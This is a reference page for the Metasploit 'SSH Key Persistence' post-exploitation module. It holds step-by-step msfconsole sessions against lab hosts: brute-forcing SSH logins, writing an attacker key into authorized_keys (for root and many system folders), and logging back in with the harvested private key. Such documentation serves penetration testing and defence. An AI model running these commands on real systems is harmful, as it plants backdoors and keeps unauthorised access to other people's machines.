SSH Key Persistence - Metasploit


This page contains detailed information about how to use the post/linux/manage/sshkey_persistence metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Table Of Contents
hide

Module Overview

Name: SSH Key Persistence
Module: post/linux/manage/sshkey_persistence
Source code: modules/post/linux/manage/sshkey_persistence.rb
Disclosure date: -
Last modification time: 2021-10-06 13:43:31 +0000
Supported architecture(s): -
Supported platform(s): Linux
Target service / protocol: -
Target network port(s): -
List of CVEs: -

This module will add an SSH key to a specified user (or all), to allow remote login via SSH at any time.

Module Ranking and Traits

Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Basic Usage

There are two ways to execute this post module.

From the Meterpreter prompt

The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:

meterpreter > run post/linux/manage/sshkey_persistence

From the msf prompt

The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.

msf > use post/linux/manage/sshkey_persistence
msf post(sshkey_persistence) > show options
    ... show and set options ...
msf post(sshkey_persistence) > set SESSION session-id
msf post(sshkey_persistence) > exploit

If you wish to run the post against all sessions from framework, here is how:

1 - Create the following resource script:


framework.sessions.each_pair do |sid, session|
  run_single("use post/linux/manage/sshkey_persistence")
  run_single("set SESSION #{sid}")
  run_single("run")
end

2 - At the msf prompt, execute the above resource script:

msf > resource path-to-resource-script

Required Options

  • SESSION: The session to run this module on.

Knowledge Base

This module will add an SSH key to a specified user (or all), to allow remote login on the victim via SSH at any time.

Creating A Testing Environment

This module has been tested against:

  1. Kali Rolling
  2. Ubuntu 16.04
  3. Centos 6
  4. Fedora 20
  5. FreeBSD 9

Verification Steps

  1. Start msfconsole
  2. Exploit a box via whatever method
  3. Do: use post/linux/manage/sshkey_persistence
  4. Do: set session #
  5. Optional Do: set username
  6. Do: set verbose true
  7. Optional Do: Set sshd_config
  8. Do: exploit

Options

SSHD_CONFIG

Location of the sshd_config file on the remote system. We use this to determine if the authorized_keys file location has changed on the system. If it hasn't, we default to .ssh/authorized_keys

USERNAME

If set, we only write our key to this user. If not, we'll write to all users

PUBKEY

A public key to use. If not provided, a pub/priv key pair is generated automatically

Scenarios

Ubuntu 16.04 (user level)

Get initial access

msf auxiliary(ssh_login) > exploit

[*] SSH - Starting bruteforce
[+] SSH - Success: 'tiki:tiki' 'uid=1000(tiki) gid=1000(tiki) groups=1000(tiki),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),117(lpadmin),118(sambashare) Linux tikiwiki 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '
[!] No active DB -- Credential data will not be saved!
[*] Command shell session 1 opened (192.168.2.229:38886 -> 192.168.2.190:22) at 2016-06-19 09:52:48 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Use the post module to write the ssh key

msf auxiliary(ssh_login) > use post/linux/manage/sshkey_persistence 
msf post(sshkey_persistence) > set session 1
session => 1
msf post(sshkey_persistence) > set verbose true
verbose => true
msf post(sshkey_persistence) > set user tiki
user => tiki
msf post(sshkey_persistence) > set CreateSSHFolder true
CreateSSHFolder => true
msf post(sshkey_persistence) > exploit

[*] Checking SSH Permissions
[+] Pubkey set to yes
[*] Authorized Keys File: .ssh/authorized_keys
[*] Added User SSH Path: /home/tiki/.ssh
[*] Attempting to create ssh folders that don't exist
[+] Storing new private key as /root/.msf4/loot/20160619095250_default_192.168.2.190_id_rsa_425588.txt
[*] Adding key to /home/tiki/.ssh/authorized_keys
[*] Max line length is 65537
[*] Writing 761 bytes in 1 chunks of 2886 bytes (octal-encoded), using printf
[+] Key Added
[!] No active DB -- Credential data will not be saved!
[*] Post module execution completed

Verify our access works

msf post(sshkey_persistence) > use auxiliary/scanner/ssh/ssh_login_pubkey 
msf auxiliary(ssh_login_pubkey) > set rhosts 192.168.2.190
rhosts => 192.168.2.190
msf auxiliary(ssh_login_pubkey) > set key_path /root/.msf4/loot/
key_path => /root/.msf4/loot/
msf auxiliary(ssh_login_pubkey) > set username tiki
username => tiki
msf auxiliary(ssh_login_pubkey) > run

[*] 192.168.2.190:22 SSH - Testing Cleartext Keys
[*] SSH - Testing 2 keys from /root/.msf4/loot
[+] SSH - Success: 'tiki:-----BEGIN RSA PRIVATE KEY-----
...snip...
7m+il2AWyuPWOWEnpXRur3knruE2k97ObMH92FeI8SYaIThvqNUL
-----END RSA PRIVATE KEY-----
' 'uid=1000(tiki) gid=1000(tiki) groups=1000(tiki),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),117(lpadmin),118(sambashare) Linux tikiwiki 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '
[!] No active DB -- Credential data will not be saved!
[*] Command shell session 2 opened (192.168.2.229:42580 -> 192.168.2.190:22) at 2016-06-19 09:56:22 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

If you try to run for a user you don't have permissions for

msf post(sshkey_persistence) > exploit

[*] Checking SSH Permissions
[+] Pubkey set to yes
[*] Authorized Keys File: .ssh/authorized_keys
[*] Added: /root/.ssh
[*] Attempting to create ssh folders that don't exist
[+] /root/.ssh
[*] Creating /root/.ssh folder
[-] No users found with a .ssh directory
[*] Post module execution completed

CentOS 6 (user level)

ssh keys must be enabled in sshd_config.

Get Initial Access

msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set username user
username => user
msf auxiliary(ssh_login) > set password password
password => password
msf auxiliary(ssh_login) > set rhosts 192.168.4.62
rhosts => 192.168.4.62
msf auxiliary(ssh_login) > exploit

[*] SSH - Starting bruteforce
[+] SSH - Success: 'user:password' 'uid=500(user) gid=500(user) groups=500(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 Linux localhost.localdomain 2.6.32-71.el6.x86_64 #1 SMP Fri May 20 03:51:51 BST 2011 x86_64 x86_64 x86_64 GNU/Linux '
[!] No active DB -- Credential data will not be saved!
[*] Command shell session 1 opened (192.168.2.229:39289 -> 192.168.4.62:22) at 2016-06-19 15:27:27 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Use the post module to write the ssh key

msf auxiliary(ssh_login) > use post/linux/manage/sshkey_persistence 
msf post(sshkey_persistence) > set session 1
session => 1
msf post(sshkey_persistence) > set verbose true
verbose => true
msf post(sshkey_persistence) > set user user
user => user
msf post(sshkey_persistence) > exploit

[*] Checking SSH Permissions
[*] Authorized Keys File: .ssh/authorized_keys
[*] Added User SSH Path: /home/user/.ssh
[*] Attempting to create ssh folders that don't exist
[+] Storing new private key as /root/.msf4/loot/20160619152757_default_192.168.4.62_id_rsa_633695.txt
[*] Creating /home/user/.ssh/authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1447 bytes (octal-encoded), using printf
[+] Key Added
[!] No active DB -- Credential data will not be saved!
[*] Post module execution completed

Verify our access works

msf post(sshkey_persistence) > use auxiliary/scanner/ssh/ssh_login_pubkey 
msf auxiliary(ssh_login_pubkey) > set rhosts 192.168.4.62
rhosts => 192.168.4.62
msf auxiliary(ssh_login_pubkey) > set key_path /root/.msf4/loot/
key_path => /root/.msf4/loot/
msf auxiliary(ssh_login_pubkey) > set username user
username => user
msf auxiliary(ssh_login_pubkey) > run

[*] 192.168.4.62:22 SSH - Testing Cleartext Keys
[*] SSH - Testing 6 keys from /root/.msf4/loot
[+] SSH - Success: 'user:-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA8xtiDZrE6XgkOJaatg+TvUcrEr92/GDSZUtEqO9RvvvPO1Yt
...snip...
Ubz5hiBypg1/C2TMB9jH3QLKmT66Te7rfym7rOBIgIJKivs5JLZe7w==
-----END RSA PRIVATE KEY-----
' 'uid=500(user) gid=500(user) groups=500(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 Linux localhost.localdomain 2.6.32-71.el6.x86_64 #1 SMP Fri May 20 03:51:51 BST 2011 x86_64 x86_64 x86_64 GNU/Linux '
[!] No active DB -- Credential data will not be saved!
[*] Command shell session 2 opened (192.168.2.229:34721 -> 192.168.4.62:22) at 2016-06-19 15:49:34 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

CentOS 6 (root)

The following sshd_config changes were made:

PubkeyAuthentication yes
AuthorizedKeysFile  .sshsecret/.authorized_keys
PermitRootLogin yes

Get Initial Access

msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set username root
username => root
msf auxiliary(ssh_login) > set password pass
password => pass
msf auxiliary(ssh_login) > set rhosts 192.168.4.62
rhosts => 192.168.4.62
msf auxiliary(ssh_login) > exploit

[*] SSH - Starting bruteforce
[+] SSH - Success: 'root:pass' 'uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 Linux localhost.localdomain 2.6.32-71.el6.x86_64 #1 SMP Fri May 20 03:51:51 BST 2011 x86_64 x86_64 x86_64 GNU/Linux '
[!] No active DB -- Credential data will not be saved!
[*] Command shell session 1 opened (192.168.2.229:46420 -> 192.168.4.62:22) at 2016-06-19 15:58:32 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Use the post module to write the ssh key. Keep in mind NOT setting a user (targeted), and CreateSSHFolder will possibly make MANY folders/files as can be observed below.

msf auxiliary(ssh_login) > use post/linux/manage/sshkey_persistence 
msf post(sshkey_persistence) > set session 1
session => 1
msf post(sshkey_persistence) > set verbose true
verbose => true
msf post(sshkey_persistence) > set CreateSSHFolder true
CreateSSHFolder => true
msf post(sshkey_persistence) > exploit

[*] Checking SSH Permissions
[+] Pubkey set to yes
[*] Authorized Keys File: .sshsecret/.authorized_keys
[*] Finding .sshsecret directories
[*] Attempting to create ssh folders that don't exist
[*] Creating //.sshsecret folder
[*] Creating /bin/.sshsecret folder
[*] Creating /dev/.sshsecret folder
[*] Creating /etc/abrt/.sshsecret folder
[*] Creating /etc/ntp/.sshsecret folder
[*] Creating /proc/.sshsecret folder
[*] Creating /root/.sshsecret folder
[*] Creating /sbin/.sshsecret folder
[*] Creating /usr/games/.sshsecret folder
[*] Creating /var/adm/.sshsecret folder
[*] Creating /var/cache/rpcbind/.sshsecret folder
[*] Creating /var/empty/saslauth/.sshsecret folder
[*] Creating /var/empty/sshd/.sshsecret folder
[*] Creating /var/ftp/.sshsecret folder
[*] Creating /var/gopher/.sshsecret folder
[*] Creating /var/lib/avahi-autoipd/.sshsecret folder
[*] Creating /var/lib/gdm/.sshsecret folder
[*] Creating /var/lib/hsqldb/.sshsecret folder
[*] Creating /var/lib/mysql/.sshsecret folder
[*] Creating /var/lib/nfs/.sshsecret folder
[*] Creating /var/run/avahi-daemon/.sshsecret folder
[*] Creating /var/run/pulse/.sshsecret folder
[*] Creating /var/spool/lpd/.sshsecret folder
[*] Creating /var/spool/mail/.sshsecret folder
[*] Creating /var/spool/postfix/.sshsecret folder
[*] Creating /var/spool/uucp/.sshsecret folder
[*] Creating /var/www/.sshsecret folder
[+] Storing new private key as /root/.msf4/loot/20160619155920_default_192.168.4.62_id_rsa_271813.txt
[*] Creating //.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[!] No active DB -- Credential data will not be saved!
[*] Creating /bin/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /dev/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /etc/abrt/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /etc/ntp/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Adding key to /home/user/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 761 bytes in 1 chunks of 2910 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /root/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /sbin/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /usr/games/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /var/adm/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /var/cache/rpcbind/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /var/empty/saslauth/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /var/empty/sshd/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /var/ftp/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /var/gopher/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /var/lib/avahi-autoipd/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /var/lib/gdm/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /var/lib/hsqldb/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /var/lib/mysql/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /var/lib/nfs/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /var/run/avahi-daemon/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /var/run/pulse/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /var/spool/lpd/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /var/spool/mail/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /var/spool/postfix/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /var/spool/uucp/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /var/www/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Post module execution completed

FreeBSD9 (root)

Several sshd_config mods were needed to allow root login, and enable the service to run correctly.

Get Initial Access

msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set username root
username => root
msf auxiliary(ssh_login) > set password password
password => password
msf auxiliary(ssh_login) > set rhosts 192.168.2.130
rhosts => 192.168.2.130
msf auxiliary(ssh_login) > exploit

[*] SSH - Starting bruteforce
[+] SSH - Success: 'root:password' 'uid=0(root) gid=0(wheel) groups=0(wheel),5(operator) FreeBSD freebsd9 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan  3 07:46:30 UTC 2012     [email protected]:/usr/obj/usr/src/sys/GENERIC  amd64 '
[!] No active DB -- Credential data will not be saved!
[*] Command shell session 1 opened (192.168.2.229:41724 -> 192.168.2.130:22) at 2016-06-19 22:10:59 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Use the post module to write the ssh key

msf auxiliary(ssh_login) > use post/linux/manage/sshkey_persistence 
msf post(sshkey_persistence) > set session 1
session => 1
msf post(sshkey_persistence) > set verbose true
verbose => true
msf post(sshkey_persistence) > set username root
username => root
msf post(sshkey_persistence) > exploit

[*] Checking SSH Permissions
[+] Pubkey set to yes
[*] Authorized Keys File: .ssh/authorized_keys
[*] Finding .ssh directories
[+] Storing new private key as /root/.msf4/loot/20160619221108_default_192.168.2.130_id_rsa_441694.txt
[*] Creating /root/.ssh/authorized_keys
[*] Max line length is 131073
[*] Writing 380 bytes in 1 chunks of 1461 bytes (octal-encoded), using printf
[+] Key Added
[!] No active DB -- Credential data will not be saved!
[*] Post module execution completed

Verify our access works

msf post(sshkey_persistence) > use auxiliary/scanner/ssh/ssh_login_pubkey 
msf auxiliary(ssh_login_pubkey) > set rhosts 192.168.2.130
rhosts => 192.168.2.130
msf auxiliary(ssh_login_pubkey) > set key_path /root/.msf4/loot/
key_path => /root/.msf4/loot/
msf auxiliary(ssh_login_pubkey) > set username root
username => root
msf auxiliary(ssh_login_pubkey) > run

[*] 192.168.2.130:22 SSH - Testing Cleartext Keys
[*] SSH - Testing 4 keys from /root/.msf4/loot
[+] SSH - Success: 'root:-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAqBC5XwkPOAtFn8zCFWIs3IIzUUfMvJPWxQQl1Porf8GiSs2B
...snip...
6aj815iPJp9X5vnIR6mRdTJP9UQraPe6jneicx8QfncfoqJbA2v7
-----END RSA PRIVATE KEY-----
' 'uid=0(root) gid=0(wheel) groups=0(wheel),5(operator) FreeBSD freebsd9 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan  3 07:46:30 UTC 2012     [email protected]:/usr/obj/usr/src/sys/GENERIC  amd64 '
[*] Command shell session 2 opened (192.168.2.229:32991 -> 192.168.2.130:22) at 2016-06-19 22:14:16 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Fedora 20 (root)

Get Initial Access

msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set username root
username => root
msf auxiliary(ssh_login) > set password password
password => password
msf auxiliary(ssh_login) > set rhosts 192.168.2.143
rhosts => 192.168.2.143
msf auxiliary(ssh_login) > exploit

[*] SSH - Starting bruteforce
[+] SSH - Success: 'root:password' 'uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 Linux localhost.homeGroup 3.11.10-301.fc20.x86_64 #1 SMP Thu Dec 5 14:01:17 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux '
[!] No active DB -- Credential data will not be saved!
[*] Command shell session 1 opened (192.168.2.229:35460 -> 192.168.2.143:22) at 2016-06-19 20:27:53 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Use the post module to write the ssh key

msf auxiliary(ssh_login) > use post/linux/manage/sshkey_persistence 
msf post(sshkey_persistence) > set session 1
session => 1
msf post(sshkey_persistence) > set verbose true
verbose => true
msf post(sshkey_persistence) > set user root
user => root
msf post(sshkey_persistence) > exploit

[*] Checking SSH Permissions
[*] Authorized Keys File: .ssh/authorized_keys
[*] Added User SSH Path: /root/.ssh
[+] Storing new private key as /root/.msf4/loot/20160619202835_default_192.168.2.143_id_rsa_458964.txt
[*] Creating /root/.ssh/authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1456 bytes (octal-encoded), using printf
[+] Key Added
[!] No active DB -- Credential data will not be saved!
[*] Post module execution completed

Verify our access works

msf post(sshkey_persistence) > use auxiliary/scanner/ssh/ssh_login_pubkey 
msf auxiliary(ssh_login_pubkey) > set rhosts 192.168.2.143
rhosts => 192.168.2.143
msf auxiliary(ssh_login_pubkey) > set key_path /root/.msf4/loot/
key_path => /root/.msf4/loot/
msf auxiliary(ssh_login_pubkey) > set username root
username => root
msf auxiliary(ssh_login_pubkey) > run

[*] 192.168.2.143:22 SSH - Testing Cleartext Keys
[*] SSH - Testing 2 keys from /root/.msf4/loot
[!] No active DB -- Credential data will not be saved!
[+] SSH - Success: 'root:-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAx5LLnAOPzc5KSI/Zd71bdHlexQrIpuASjUIGnJjlJVB9Sfyz
...snip...
vtOaL6/NsfxFDDrCBX72X5tv3rTA4MNzOFTYbCM80Ln6E2TDWgPv
-----END RSA PRIVATE KEY-----
' 'uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 Linux localhost.homeGroup 3.11.10-301.fc20.x86_64 #1 SMP Thu Dec 5 14:01:17 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux '
[*] Command shell session 2 opened (192.168.2.229:35751 -> 192.168.2.143:22) at 2016-06-19 20:31:23 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Fedora 20 (user level)

Get Initial Access

msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set username user
username => user
msf auxiliary(ssh_login) > set password password
password => password
msf auxiliary(ssh_login) > set rhosts 192.168.2.143
rhosts => 192.168.2.143
msf auxiliary(ssh_login) > exploit

[*] SSH - Starting bruteforce
[+] SSH - Success: 'user:password' 'uid=1000(user) gid=1000(user) groups=1000(user),10(wheel) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 Linux localhost.homeGroup 3.11.10-301.fc20.x86_64 #1 SMP Thu Dec 5 14:01:17 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux '
[!] No active DB -- Credential data will not be saved!
[*] Command shell session 1 opened (192.168.2.229:37727 -> 192.168.2.143:22) at 2016-06-19 20:33:45 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Use the post module to write the ssh key

msf auxiliary(ssh_login) > use post/linux/manage/sshkey_persistence 
msf post(sshkey_persistence) > set session 1
session => 1
msf post(sshkey_persistence) > set verbose true
verbose => true
msf post(sshkey_persistence) > set username user
username => user
msf post(sshkey_persistence) > exploit

[*] Checking SSH Permissions
[*] Authorized Keys File: .ssh/authorized_keys
[*] Finding .ssh directories
[+] Storing new private key as /root/.msf4/loot/20160619203401_default_192.168.2.143_id_rsa_010117.txt
[*] Creating /home/user/.ssh/authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1452 bytes (octal-encoded), using printf
[+] Key Added
[!] No active DB -- Credential data will not be saved!
[*] Post module execution completed

Go back to menu.

Msfconsole Usage

Here is how the linux/manage/sshkey_persistence post exploitation module looks in the msfconsole:

msf6 > use post/linux/manage/sshkey_persistence

msf6 post(linux/manage/sshkey_persistence) > show info

       Name: SSH Key Persistence
     Module: post/linux/manage/sshkey_persistence
   Platform: Linux
       Arch: 
       Rank: Excellent

Provided by:
  h00die <[email protected]>

Compatible session types:
  Meterpreter
  Shell

Basic options:
  Name             Current Setting       Required  Description
  ----             ---------------       --------  -----------
  CREATESSHFOLDER  false                 yes       If no .ssh folder is found, create it for a user
  PUBKEY                                 no        Public Key File to use. (Default: Create a new one)
  SESSION                                yes       The session to run this module on.
  SSHD_CONFIG      /etc/ssh/sshd_config  yes       sshd_config file
  USERNAME                               no        User to add SSH key to (Default: all users on box)

Description:
  This module will add an SSH key to a specified user (or all), to 
  allow remote login via SSH at any time.

Module Options

This is a complete list of options available in the linux/manage/sshkey_persistence post exploitation module:

msf6 post(linux/manage/sshkey_persistence) > show options

Module options (post/linux/manage/sshkey_persistence):

   Name             Current Setting       Required  Description
   ----             ---------------       --------  -----------
   CREATESSHFOLDER  false                 yes       If no .ssh folder is found, create it for a user
   PUBKEY                                 no        Public Key File to use. (Default: Create a new one)
   SESSION                                yes       The session to run this module on.
   SSHD_CONFIG      /etc/ssh/sshd_config  yes       sshd_config file
   USERNAME                               no        User to add SSH key to (Default: all users on box)

Advanced Options

Here is a complete list of advanced options supported by the linux/manage/sshkey_persistence post exploitation module:

msf6 post(linux/manage/sshkey_persistence) > show advanced

Module advanced options (post/linux/manage/sshkey_persistence):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   VERBOSE    false            no        Enable detailed status messages
   WORKSPACE                   no        Specify the workspace for this module

Post Actions

This is a list of all post exploitation actions which the linux/manage/sshkey_persistence module can do:

msf6 post(linux/manage/sshkey_persistence) > show actions

Post actions:

   Name  Description
   ----  -----------

Evasion Options

Here is the full list of possible evasion options supported by the linux/manage/sshkey_persistence post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 post(linux/manage/sshkey_persistence) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages

This module may fail with the following error messages:

Error Messages

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Pubkey Authentication disabled

Here is a relevant code snippet related to the "Pubkey Authentication disabled" error message:

48:	    end
49:	    print_status('Checking SSH Permissions')
50:	    sshd_config = read_file(datastore['SSHD_CONFIG'])
51:	    /^PubkeyAuthentication[\s]+(?<pub_key>yes|no)/ =~ sshd_config
52:	    if pub_key && pub_key == 'no'
53:	      print_error('Pubkey Authentication disabled')
54:	    elsif pub_key
55:	      vprint_good("Pubkey set to #{pub_key}")
56:	    end
57:	    /^AuthorizedKeysFile[\s]+(?<auth_key_file>[\w%\/\.]+)/ =~ sshd_config
58:	    if auth_key_file

No users found with a <AUTH_KEY_FOLDER> directory

Here is a relevant code snippet related to the "No users found with a <AUTH_KEY_FOLDER> directory" error message:

90:	      end
91:	    end
92:	
93:	    paths = paths.select { |d| directory?(d) }
94:	    if paths.nil? || paths.empty?
95:	      print_error("No users found with a #{auth_key_folder} directory")
96:	      return
97:	    end
98:	    write_key(paths, auth_key_file, sep)
99:	  end
100:

Go back to menu.

Go back to menu.

See Also

Check also the following modules related to this module:

Authors

Version

This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.